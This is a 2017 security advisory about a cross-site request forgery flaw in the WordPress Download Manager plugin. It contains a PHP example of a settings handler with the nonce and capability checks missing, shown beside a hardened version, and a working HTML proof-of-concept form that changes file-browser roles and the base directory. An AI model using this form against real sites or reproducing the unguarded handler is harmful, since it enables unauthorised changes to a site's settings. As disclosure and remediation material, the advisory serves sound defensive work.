Burak Kelebek - Securify, March 2017

Cross-Site Request Forgery in WordPress Download Manager Plugin


Abstract

A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager Plugin. By using this vulnerability an attacker can change confidential settings of the plugin.


For feedback or questions about this advisory mail us at sumofpwn at

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. It is a community summer event in which a large group of security bughunters from around the world collaborate in a month of security research on Open Source Software (WordPress this time), for fun. The event is hosted by Securify in Amsterdam.



Tested versions

This issue was successfully tested on WordPress Download Manager version 2.8.99.


Fix

There is currently no fix available.


Introduction

WordPress Download Manager is a Files / Documents Management Plugin and Complete e-Commerce Solution for selling digital products. The WordPress Download Manager plugin helps you to manage, track and control file downloads, and to sell digital products from your WordPress site. Password Protection and User Roles Protection control access to your files, and prices can be set when a digital item is for sale. Users can directly download free items; when an item has a price the user has to go through the cart and checkout. The plugin offers a simple checkout option to give the user a better purchasing experience, which increases the probability that an order is completed: rather than trying to convince a customer to buy something, cart optimization is about removing the barriers to that goal.

It was discovered that WordPress Download Manager is vulnerable to Cross-Site Request Forgery.


Details

The Download Manager plugin does not require a CSRF (nonce) token on the request that saves its settings; the admin-ajax.php handler accepts any request that carries a logged-in user's session cookie. Because of this an attacker is able to change confidential settings such as the file browser access roles and the file browser base directory by luring a logged-in administrator to a malicious page that submits the form in the proof of concept below to the target site.
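To make the missing check concrete, the following is an added example written for this page (it is not the plugin's own code) of a settings-save AJAX handler in the shape the advisory describes, placed beside a hardened version. The hook name `wp_ajax_wdm_settings`, the function names and the option keys are assumptions chosen to mirror the `action` and field names in the proof of concept; the WordPress API calls themselves (`check_ajax_referer`, `wp_nonce_field`, `current_user_can`, `wp_roles`) are real.

```php
<?php
// Added example, not the plugin's code. Hook, function and option names are
// assumptions mirroring the PoC's request parameters.

// --- Vulnerable shape: any logged-in session can save settings -------------
// admin-ajax.php dispatches action=wdm_settings to wp_ajax_wdm_settings for
// authenticated users. Nothing here proves the request came from the plugin's
// own settings page, so a cross-origin form POST is accepted.
add_action( 'wp_ajax_wdm_settings', 'example_wdm_settings_vulnerable' );
function example_wdm_settings_vulnerable() {
    if ( ! is_user_logged_in() ) {
        wp_die( 'Access Denied' );
    }
    // The browser attaches the victim's cookies to the attacker's form
    // submission, so every field below is attacker-controlled.
    update_option( '_wpdm_file_browser_root',   $_POST['_wpdm_file_browser_root'] );
    update_option( '_wpdm_file_browser_access', $_POST['_wpdm_file_browser_access'] );
    wp_send_json_success();
}

// --- Hardened shape: capability check plus a nonce bound to this action ----
add_action( 'wp_ajax_wdm_settings', 'example_wdm_settings_hardened' );
function example_wdm_settings_hardened() {
    // 1. Only users who may manage site options may change plugin settings.
    //    "Logged in" is not enough; a Subscriber session should not reach this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Access Denied', 403 );
    }

    // 2. Require a nonce tied to this specific action. The nonce is derived
    //    from the user's session and a time window, so an attacker's page
    //    cannot know it in advance. check_ajax_referer() ends the request
    //    when the token is missing or invalid, before any option is written.
    check_ajax_referer( 'wdm_save_settings', '_wpnonce' );

    // 3. Sanitize and whitelist before storing. Roles are restricted to names
    //    that actually exist on this site.
    $root  = isset( $_POST['_wpdm_file_browser_root'] )
        ? sanitize_text_field( wp_unslash( $_POST['_wpdm_file_browser_root'] ) )
        : '';
    $roles = isset( $_POST['_wpdm_file_browser_access'] )
        ? (array) wp_unslash( $_POST['_wpdm_file_browser_access'] )
        : array();
    $roles = array_map( 'sanitize_key', $roles );
    $roles = array_values( array_intersect( $roles, array_keys( wp_roles()->get_names() ) ) );

    update_option( '_wpdm_file_browser_root',   $root );
    update_option( '_wpdm_file_browser_access', $roles );
    wp_send_json_success();
}

// The legitimate settings form must embed the matching nonce; with the
// hardened handler, a form without it (such as the attacker's copy) is
// rejected even when submitted by a logged-in administrator.
function example_wdm_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="wdm_settings"/>';
    wp_nonce_field( 'wdm_save_settings', '_wpnonce' );
    // ... remaining settings fields go here ...
    echo '<input type="submit" value="Save"/>';
    echo '</form>';
}
```

Two caveats worth keeping in mind when reviewing a fix of this kind: a WordPress nonce is valid for up to 24 hours rather than single-use, so it stops cross-site forgery but is not a replay token, and the nonce check only helps if it is paired with a capability check, since a nonce minted for a low-privileged user's session would otherwise let that user save settings directly.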

Proof of concept

The proof of concept below grants file browser access to users with the Editor role (while keeping it for administrators) and sets the file browser base directory, when the form is submitted by a logged-in administrator's browser:

      <!-- Attacker-hosted page: the victim's browser attaches the admin's session cookies to this POST -->
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="task" value="wdm_save_settings"/>
         <input type="hidden" name="action" value="wdm_settings"/>
         <input type="hidden" name="section" value="basic"/>
         <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
         <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
         <!-- base directory of the file browser, chosen by the attacker -->
         <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
         <!-- roles allowed to use the file browser: Editor is added -->
         <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
         <input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
         <input type="hidden" name="__wpdm_download_speed" value="4096"/>
         <input type="hidden" name="__wpdm_download_resume" value="1"/>
         <input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
         <input type="hidden" name="__wpdm_open_in_browser" value="0"/>
         <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
         <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
         <input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
         <input type="hidden" name="__wpdm_login_url" value=""/>
         <input type="hidden" name="__wpdm_register_url" value=""/>
         <input type="hidden" name="__wpdm_user_dashboard" value=""/>
         <input type="submit"/>
      </form>